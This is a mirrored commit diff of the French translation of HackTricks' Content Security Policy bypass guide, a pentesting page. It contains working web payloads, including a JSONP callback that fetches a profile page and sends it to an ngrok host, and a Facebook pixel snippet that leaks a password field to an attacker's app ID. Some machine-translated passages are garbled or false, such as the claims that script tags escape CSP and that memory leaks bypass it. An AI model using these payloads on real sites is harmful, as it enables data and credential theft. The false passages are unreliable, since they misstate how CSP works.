Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['pentesting-web/content-security-policy-csp-bypass/README.md

Browse source
This commit is contained in:
Translator 2023-11-05 22:22:59 +00:00
parent 3deb56ab93
commit 395175bf16
1 changed files with 104 additions and 19 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

123
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -14,12 +14,12 @@
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof est la plateforme de tous les programmes de primes pour les bugs de crypto.**
**HackenProof est la plateforme des primes de bugs cryptographiques.**
**Obtenez des récompenses sans délai**\
Les primes HackenProof ne sont lancées que lorsque les clients déposent le budget de récompense. Vous recevrez la récompense après la vérification du bug.
**Acquérez de l'expérience en pentest web3**\
**Acquérez de l'expérience en pentesting web3**\
Les protocoles blockchain et les contrats intelligents sont le nouvel Internet ! Maîtrisez la sécurité web3 dès ses débuts.
**Devenez une légende du piratage web3**\
@ -31,9 +31,9 @@ Gagnez des points de réputation avec chaque bug vérifié et conquérez le somm
## Qu'est-ce que CSP
La politique de sécurité du contenu (Content Security Policy ou CSP) est une technologie intégrée au navigateur qui **aide à se protéger contre des attaques telles que les scripts intersites (XSS)**. Elle répertorie et décrit les chemins et sources à partir desquels le navigateur peut charger en toute sécurité des ressources. Les ressources peuvent inclure des images, des frames, du javascript et plus encore. Voici un exemple de ressources autorisées à être chargées et exécutées en ligne à partir du domaine local (self), et permettant l'exécution de code sous forme de chaîne avec des fonctions telles que `eval`, `setTimeout` ou `setInterval:`
La politique de sécurité du contenu (Content Security Policy ou CSP) est une technologie intégrée au navigateur qui **aide à se protéger contre des attaques telles que les scripts intersites (XSS)**. Elle répertorie et décrit les chemins et sources à partir desquels le navigateur peut charger en toute sécurité des ressources. Les ressources peuvent inclure des images, des frames, du javascript et plus encore. Voici un exemple de ressources autorisées à être chargées et exécutées en ligne à partir du domaine local (self), ainsi que des fonctions d'exécution de code en chaîne telles que `eval`, `setTimeout` ou `setInterval` :
La politique de sécurité du contenu est mise en œuvre via des **en-têtes de réponse** ou des **éléments meta de la page HTML**. Le navigateur suit la politique reçue et bloque activement les violations détectées.
La politique de sécurité du contenu est mise en œuvre via **les en-têtes de réponse** ou **les éléments meta de la page HTML**. Le navigateur suit la politique reçue et bloque activement les violations détectées.
Mise en œuvre via l'en-tête de réponse :
```http
@ -103,7 +103,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
Charge utile de travail : `"/><script>alert(1);</script>`
#### self + 'unsafe-inline' via les iframes
#### self + 'unsafe-inline' via les Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
@ -197,7 +197,13 @@ Chargez une version vulnérable d'Angular et exécutez du code JS arbitraire :
</script>
```
Dans cet exemple, nous chargeons une version vulnérable d'Angular (1.2.0) à partir de la bibliothèque Google CDN. Ensuite, nous créons un module Angular appelé "myApp" et un contrôleur appelé "myController". Dans le contrôleur, nous définissons une variable $scope "name" avec la valeur "John Doe". Cette vulnérabilité permet à un attaquant d'exécuter du code JS arbitraire sur la page.
```html
<div ng-app="myApp" ng-controller="myController">
<h1>Welcome, {{name}}!</h1>
</div>
```
Dans cet exemple, nous chargeons une version vulnérable d'Angular (1.2.0) à partir de la bibliothèque Google CDN. En utilisant AngularJS, nous créons un module appelé "myApp" et un contrôleur appelé "myController". Le contrôleur définit une variable $scope appelée "name" avec la valeur "John Doe". Ensuite, nous utilisons la directive "ng-app" pour déclarer l'application AngularJS et la directive "ng-controller" pour lier le contrôleur "myController" à une partie spécifique de la page HTML. Enfin, nous utilisons la syntaxe double accolade "{{name}}" pour afficher la valeur de la variable "name" dans un élément `<h1>`.
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@ -264,15 +270,20 @@ ng-init="c.init()"
```
### Points de terminaison tiers + JSONP
JSONP (JSON with Padding) est une technique utilisée pour contourner la politique de sécurité du contenu (CSP) lors de l'accès à des ressources tierces. La CSP est une couche de sécurité qui permet aux propriétaires de sites web de spécifier les sources légitimes de contenu qui peuvent être chargées sur leurs pages. Cela aide à prévenir les attaques de type cross-site scripting (XSS) en limitant les sources de contenu autorisées.
JSONP (JSON with Padding) est une technique utilisée pour contourner la politique de sécurité du contenu (CSP) lors de l'accès à des ressources tierces. La CSP est une couche de sécurité qui permet aux propriétaires de sites web de spécifier les sources de contenu autorisées à être chargées sur leurs pages. Cela aide à prévenir les attaques de type cross-site scripting (XSS) en limitant les sources de contenu potentiellement dangereuses.
Cependant, certaines applications web utilisent des points de terminaison tiers pour récupérer des données JSON. Si ces points de terminaison ne sont pas autorisés par la CSP, il est possible d'utiliser JSONP pour contourner cette restriction.
Cependant, certaines applications web peuvent nécessiter l'accès à des ressources tierces qui ne sont pas autorisées par la CSP. C'est là que JSONP entre en jeu. JSONP permet de contourner la CSP en utilisant une balise `<script>` pour charger des données JSON provenant d'un domaine tiers. Cette technique fonctionne car les balises `<script>` ne sont pas soumises à la CSP.
JSONP fonctionne en ajoutant dynamiquement un script à la page web qui charge les données JSON à partir du point de terminaison tiers. Le point de terminaison doit prendre en charge JSONP en enveloppant les données JSON dans une fonction de rappel spécifiée par le client. Lorsque le script est chargé, la fonction de rappel est exécutée avec les données JSON en tant que paramètre.
Voici comment cela fonctionne :
Pour exploiter cette vulnérabilité, un attaquant peut utiliser un point de terminaison tiers vulnérable à JSONP pour exécuter du code malveillant sur la page web cible. Cela peut permettre à l'attaquant de voler des informations sensibles, d'injecter du contenu malveillant ou de compromettre la sécurité de la page web.
1. L'application web crée une fonction JavaScript qui sera appelée avec les données JSON.
2. L'application web ajoute dynamiquement une balise `<script>` à la page, en spécifiant l'URL du domaine tiers et la fonction à appeler.
3. Le serveur du domaine tiers renvoie les données JSON enveloppées dans un appel à la fonction spécifiée.
4. Lorsque la balise `<script>` est chargée, la fonction JavaScript est appelée avec les données JSON.
Il est important de noter que JSONP présente des risques de sécurité et est considéré comme une technique obsolète. Il est recommandé d'utiliser des méthodes plus sécurisées, telles que CORS (Cross-Origin Resource Sharing), pour accéder à des ressources tierces de manière contrôlée et sécurisée.
Il est important de noter que JSONP présente des risques de sécurité, car il permet l'exécution de code JavaScript provenant de sources tierces. Cela peut être exploité par des attaquants pour mener des attaques de type XSS. Par conséquent, il est essentiel de mettre en place des mesures de sécurité appropriées lors de l'utilisation de JSONP.
En conclusion, JSONP est une technique utile pour contourner la CSP lors de l'accès à des ressources tierces non autorisées. Cependant, il est important de comprendre les risques associés et de prendre les mesures de sécurité appropriées pour protéger votre application web contre les attaques.
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
@ -286,15 +297,89 @@ Des scénarios comme celui-ci où `script-src` est défini sur `self` et un doma
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **contient des points de terminaison JSONP prêts à l'emploi pour contourner CSP sur différents sites web.**
[**JSONBee**](https://github.com/zigoo0/JSONBee) **contient des points de terminaison JSONP prêts à l'emploi pour contourner la CSP de différents sites web.**
La même vulnérabilité se produira si le **point de terminaison de confiance contient une redirection ouverte** car si le point de terminaison initial est de confiance, les redirections sont de confiance.
La même vulnérabilité se produira si le **point de terminaison de confiance contient une redirection ouverte** car si le point de terminaison initial est fiable, les redirections sont fiables.
### Abus de tiers
Comme décrit dans le [post suivant](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), il existe de nombreux domaines tiers, qui peuvent être autorisés quelque part dans la CSP, peuvent être utilisés de manière abusive pour exfiltrer des données ou exécuter du code JavaScript. Certains de ces tiers sont :
| Entité | Domaine autorisé | Capacités |
|--------|-----------------|------------|
| Facebook | www.facebook.com, *.facebook.com | Exfiltration |
| Hotjar | *.hotjar.com, ask.hotjar.io | Exfiltration |
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exécution |
| Amazon CloudFront | *.cloudfront.net | Exfiltration, Exécution |
| Amazon AWS | *.amazonaws.com | Exfiltration, Exécution |
| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfiltration, Exécution |
| Salesforce Heroku | *.herokuapp.com | Exfiltration, Exécution |
| Google Firebase | *.firebaseapp.com | Exfiltration, Exécution |
Si vous trouvez l'un des domaines autorisés dans la CSP de votre cible, il est possible que vous puissiez contourner la CSP en vous inscrivant sur le service tiers et en exfiltrant des données vers ce service ou en exécutant du code.
Par exemple, si vous trouvez la CSP suivante :
```
Content-Security-Policy: default-src 'self www.facebook.com;
```
# Contournement de la politique de sécurité du contenu (CSP)
La politique de sécurité du contenu (CSP) est un mécanisme de sécurité utilisé par les sites web pour limiter les types de contenu qui peuvent être chargés et exécutés sur une page. Cela aide à prévenir les attaques telles que l'injection de scripts malveillants ou le chargement de contenu non autorisé.
Cependant, il existe des techniques de contournement qui permettent aux attaquants de contourner la CSP et d'exécuter du contenu non autorisé sur une page. Dans ce guide, nous examinerons quelques-unes de ces techniques de contournement courantes.
## Contournement de la CSP via les directives non strictes
Certaines directives CSP peuvent être contournées en utilisant des directives non strictes. Par exemple, si la directive `script-src` autorise uniquement les scripts provenant d'un domaine spécifique, il est possible de contourner cette restriction en utilisant une directive non stricte telle que `script-src-elem` ou `script-src-attr`.
Voici un exemple de contournement de la CSP en utilisant la directive `script-src-elem` :
```html
<script src="https://example.com/malicious.js" nonce="random-nonce"></script>
```
Dans cet exemple, nous utilisons la directive `script-src-elem` pour charger un script malveillant à partir d'un domaine non autorisé. Le nonce généré aléatoirement est utilisé pour contourner la restriction de la CSP.
## Contournement de la CSP via les fuites de mémoire
Les fuites de mémoire peuvent également être utilisées pour contourner la CSP. Une fuite de mémoire se produit lorsqu'une application web stocke des informations sensibles dans la mémoire de l'ordinateur de l'utilisateur et que ces informations peuvent être récupérées par un attaquant.
Par exemple, si une application stocke un jeton d'authentification dans la mémoire de l'ordinateur de l'utilisateur, un attaquant peut utiliser une fuite de mémoire pour récupérer ce jeton et contourner la CSP.
## Contournement de la CSP via les attaques de type XSS
Les attaques de type XSS (Cross-Site Scripting) peuvent également être utilisées pour contourner la CSP. Une attaque XSS se produit lorsqu'un attaquant parvient à injecter du code JavaScript malveillant dans une page web.
Si la CSP n'est pas correctement configurée pour bloquer les attaques XSS, un attaquant peut utiliser cette vulnérabilité pour contourner la CSP et exécuter du code JavaScript non autorisé sur la page.
## Conclusion
La politique de sécurité du contenu (CSP) est un mécanisme important pour renforcer la sécurité des sites web. Cependant, il est essentiel de comprendre les techniques de contournement courantes afin de pouvoir les prévenir et les contrer efficacement. En utilisant des directives strictes, en évitant les fuites de mémoire et en protégeant contre les attaques XSS, vous pouvez renforcer la sécurité de votre application web.
```
Content-Security-Policy: connect-src www.facebook.com;
```
Vous devriez être en mesure d'exfiltrer des données, de la même manière que cela a toujours été fait avec [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Dans ce cas, suivez ces étapes générales :
1. Créez un compte développeur Facebook ici.
1. Créez une nouvelle application "Facebook Login" et sélectionnez "Site web".
1. Allez dans "Paramètres -> Général" et obtenez votre "ID d'application".
1. Sur le site cible à partir duquel vous souhaitez exfiltrer des données, vous pouvez le faire en utilisant directement le gadget SDK Facebook "fbq" via un "customEvent" et la charge utile de données.
1. Accédez à votre "Gestionnaire d'événements" de l'application et sélectionnez l'application que vous avez créée (notez que le gestionnaire d'événements peut être trouvé dans une URL similaire à celle-ci : https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events).
1. Sélectionnez l'onglet "Événements de test" pour voir les événements envoyés par votre site web.
Ensuite, du côté de la victime, exécutez le code suivant pour initialiser le pixel de suivi Facebook afin de pointer vers l'ID d'application de compte développeur Facebook de l'attaquant et émettre un événement personnalisé comme ceci :
```JavaScript
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
Quant aux sept autres domaines tiers spécifiés dans le tableau précédent, il existe de nombreuses autres façons de les exploiter. Consultez l'[article de blog](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) précédent pour des explications supplémentaires sur d'autres abus de tiers.
### Contournement via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
En plus de la redirection mentionnée précédemment pour contourner les restrictions de chemin, il existe une autre technique appelée Relative Path Overwrite (RPO) qui peut être utilisée sur certains serveurs.
Par exemple, si CSP autorise le chemin `https://example.com/scripts/react/`, il peut être contourné de la manière suivante:
Par exemple, si CSP autorise le chemin `https://example.com/scripts/react/`, il peut être contourné de la manière suivante :
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
@ -491,13 +576,13 @@ run();
```
### Via Bookmarklets
Cette attaque impliquerait une certaine ingénierie sociale où l'attaquant **convainc l'utilisateur de faire glisser et déposer un lien sur le bookmarklet du navigateur**. Ce bookmarklet contiendrait du **code JavaScript malveillant** qui, lorsqu'il est glissé-déposé ou cliqué, serait exécuté dans le contexte de la fenêtre Web actuelle, **contournant la CSP et permettant de voler des informations sensibles** telles que les cookies ou les jetons.
Cette attaque impliquerait une ingénierie sociale où l'attaquant **convainc l'utilisateur de faire glisser et déposer un lien sur le bookmarklet du navigateur**. Ce bookmarklet contiendrait du **code JavaScript malveillant** qui, lorsqu'il est glissé-déposé ou cliqué, serait exécuté dans le contexte de la fenêtre Web actuelle, **contournant la CSP et permettant de voler des informations sensibles** telles que les cookies ou les jetons.
Pour plus d'informations, [**consultez le rapport original ici**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
### Contournement de la CSP en restreignant la CSP
Dans [**ce compte rendu de CTF**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), la CSP est contournée en injectant dans un iframe autorisé une CSP plus restrictive qui interdit le chargement d'un fichier JS spécifique qui, ensuite, via une **pollution de prototype** ou un **dom clobbering**, permet de **utiliser un autre script pour charger un script arbitraire**.
Dans [**ce compte rendu de CTF**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), la CSP est contournée en injectant dans un iframe autorisé une CSP plus restrictive qui interdit le chargement d'un fichier JS spécifique qui, ensuite, via une **pollution de prototype** ou un **écrasement du DOM**, permet de **utiliser un script différent pour charger un script arbitraire**.
Vous pouvez **restreindre une CSP d'un iframe** avec l'attribut **`csp`**:
@ -519,7 +604,7 @@ CSP peut être rendu plus restrictif en utilisant des **balises méta HTML** et
Si vous parvenez à faire en sorte que le serveur réponde avec l'en-tête **`Content-Security-Policy-Report-Only`** avec une **valeur contrôlée par vous** (peut-être à cause d'un CRLF), vous pourriez le faire pointer vers votre serveur et si vous **enveloppez** le **contenu JS** que vous souhaitez exfiltrer avec **`<script>`** et parce que `unsafe-inline` n'est probablement pas autorisé par le CSP, cela va **déclencher une erreur CSP** et une partie du script (contenant les informations sensibles) sera envoyée au serveur depuis `Content-Security-Policy-Report-Only`.
Pour un exemple, [**consultez cette solution de CTF**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
Pour un exemple, [**consultez cette solution CTF**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
@ -580,7 +665,7 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
```
### SOME + 'self' + wordpress
SOME est une technique qui exploite une XSS (ou une XSS très limitée) **dans un point d'extrémité d'une page** pour **exploiter** **d'autres points d'extrémité de la même origine.** Cela est fait en chargeant le point d'extrémité vulnérable à partir d'une page d'attaquant, puis en actualisant la page d'attaquant vers le point d'extrémité réel dans la même origine que vous souhaitez exploiter. De cette façon, le **point d'extrémité vulnérable** peut utiliser l'objet **`opener`** dans la **charge utile** pour **accéder au DOM** du **point d'extrémité réel à exploiter**. Pour plus d'informations, consultez :
SOME est une technique qui abuse d'une XSS (ou d'une XSS très limitée) **dans un point d'extrémité d'une page** pour **abuser** **d'autres points d'extrémité de la même origine.** Cela est fait en chargeant le point d'extrémité vulnérable à partir d'une page d'attaquant, puis en actualisant la page d'attaquant vers le point d'extrémité réel dans la même origine que vous souhaitez abuser. De cette façon, le **point d'extrémité vulnérable** peut utiliser l'objet **`opener`** dans la **charge utile** pour **accéder au DOM** du **point d'extrémité réel à abuser**. Pour plus d'informations, consultez :
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](../xss-cross-site-scripting/some-same-origin-method-execution.md)
@ -588,7 +673,7 @@ SOME est une technique qui exploite une XSS (ou une XSS très limitée) **dans u
De plus, **wordpress** dispose d'un point d'extrémité **JSONP** dans `/wp-json/wp/v2/users/1?_jsonp=data` qui **reflète** les **données** envoyées en sortie (avec la limitation aux lettres, chiffres et points uniquement).
Un attaquant peut exploiter ce point d'extrémité pour **générer une attaque SOME** contre WordPress et **l'intégrer** dans `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` notez que ce **script** sera **chargé** car il est **autorisé par 'self'**. De plus, et parce que WordPress est installé, un attaquant peut exploiter l'**attaque SOME** via le point d'extrémité de **rappel** **vulnérable** qui **contourne la CSP** pour accorder plus de privilèges à un utilisateur, installer un nouveau plugin...
Un attaquant peut abuser de ce point d'extrémité pour **générer une attaque SOME** contre WordPress et **l'intégrer** dans `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` notez que ce **script** sera **chargé** car il est **autorisé par 'self'**. De plus, et parce que WordPress est installé, un attaquant peut abuser de l'**attaque SOME** via le point d'extrémité de **rappel** vulnérable qui **contourne la CSP** pour accorder plus de privilèges à un utilisateur, installer un nouveau plugin...
Pour plus d'informations sur la façon d'effectuer cette attaque, consultez [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
## Contournements de la politique de sécurité du contenu (CSP) pour l'exfiltration